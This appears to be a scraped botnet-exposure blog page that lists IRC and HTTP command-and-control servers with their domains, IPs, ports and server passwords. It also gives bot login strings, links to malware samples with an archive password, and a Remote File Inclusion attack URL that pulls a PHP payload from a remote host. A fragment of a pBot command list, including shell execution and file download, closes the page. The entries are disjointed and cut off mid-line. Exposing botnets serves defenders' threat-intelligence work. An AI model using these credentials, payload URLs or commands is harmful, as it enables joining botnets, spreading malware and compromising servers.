Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html

Resolved : [gigasphere.su] To [61.31.99.67]
Resolved : [gigasphere.su] To [82.165.135.196]
Resolved : [gigasphere.su] To [173.246.102.122]

Remote Host / Port Number
61.31.99.67 4042 PASS ngrBot
61.31.99.67 1863 PASS ngrBot

other ports used for ircd: 81,3333,1234,33333

NICK new[USA|XP|COMPUTERNAME]eejxdfy
USER xd "" "lol" :xd

Channels:
Now talking in #boss
Topic On: [ #boss
f.maqder.info(irc botnet hosted in United States Dallas Theplanet.com Internet Services Inc)
Resolved : [f.maqder.info] To [174.123.76.49]

Remote Host / Port Number
174.123.76.49 1863

PASS ..
NICK SB-USA-XP-GgmPsYRi
USER SB-USA-XP-GgmPsYRi 0 * f.maqder.info :SB-USA-XP-GgmPsYRi
JOIN #sly ss

Sample: sample is .jpg, so don't open the URL in your browser, and use VMware.

hosting infos: http://whois.domaintools.com/174.123.76.49
fasharlz.com(ngrBot hosted in United States Denver Wbs Connect)
Resolved : [fasharlz.com] To [8.33.7.91]

Remote Host / Port Number
174.140.174.50 80
199.15.234.7 80
62.149.142.23 80
8.33.7.91 8879 PASS secret

NICK n{US|XPa}wjipllb
USER wjipllb 0 0 :wjipllb
JOIN #ircp secret
PRIVMSG #ircp :[d="http://www.lazynews.net/fashashogun.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) - Redirected 8 domain(s)
anonproducts.info(Loader hosted in Germany Frankfurt Leaseweb Germany Gmbh)
Another post from same guy here http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

Samples here: http://www.mediafire.com/?f25869md9bv3q9d
password: virus

Control Panel URL: http://anonproducts.info/xx/

Loader.exe is a .NET HTTP bot that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATs). Most files to be installed are loaded from webcamchat4free.in.

Packet captures of it in action: http://www.mediafire.com/?t8obhi8jttvh1l5

Credits to our
we.be.thu.gs(Insomnia bot hosted in Netherlands Amsterdam Ecatel Ltd)
A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server; you can read the comments for more.

Resolved : [we.be.thu.gs] To [80.82.79.21]

Bv1’s insomnia bot server
Server: we.be.thu.gs
SSL required to connect. Use xchat, or install it on mIRC; accept his invalid certificate.
Port: 443
Password: fuckyou
To connect do this: /server we.be.thu.gs:+443
INSOMNIA IRC Bot v1.1.3 Manual
Insomnia is another IRC bot sold in hecking forums, coded in .NET. I'm posting the manual here so you can see what it does.

INSOMNIA v1.1.3

Table of Contents
1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list

Summary
Insomnia
noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)
Resolved : [noaccess.chaoswow.net] To [176.9.195.60]

Remote Host / Port Number
noaccess.chaoswow.net 18967

NICK USA|00|XP|SP2|1884237
USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237
USERHOST USA|00|XP|SP2|1884237
MODE USA|00|XP|SP2|1884237 -x+i
JOIN ##&crackr0x#&## 1@$$smoqueed@@

NICK USA|00|XP|SP2|0441020
USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020
USERHOST USA|00|XP|SP2|0441020
MODE USA|00|XP|SP2|0441020 -x+i

NICK USA|00|XP|SP2|5607084
USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084
USERHOST USA|00|XP|SP2|5607084
MODE USA|00|XP|SP2|5607084 -x+i

NICK USA|00|XP|SP2|5062754
USER oqqeofyr 0
fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)
Remote Host / Port Number
fghfg.translate-google-cache.com 5900

other domains:
tux.shannen.cc
urcdw.zavoddebila.com

NICK [USA][XP-SP2]669217
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY2742
JOIN ##Turb0-37##

NICK [USA][XP-SP2]062388
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY7011

NICK {NOVA}[USA][XP-SP2]750366
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY0938

hosting infos: http://whois.domaintools.com/61.31.99.67
Irc.javairc.org(Turkish noobs scanning for RFI)
I was looking for online users on my vBulletin site and I saw this:

/threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg

I downloaded apache.jpg and found that it is a lame pBot directing to irc.javairc.org. Here, at http://95.154.24.14:32000//accounts/, I found the lamer behind all this:

-=[ HackeD by PasteL ]=-

Here is the channel used for the RFI scan:

Now talking in
69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)
= COMMANDS ============================================================================
.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a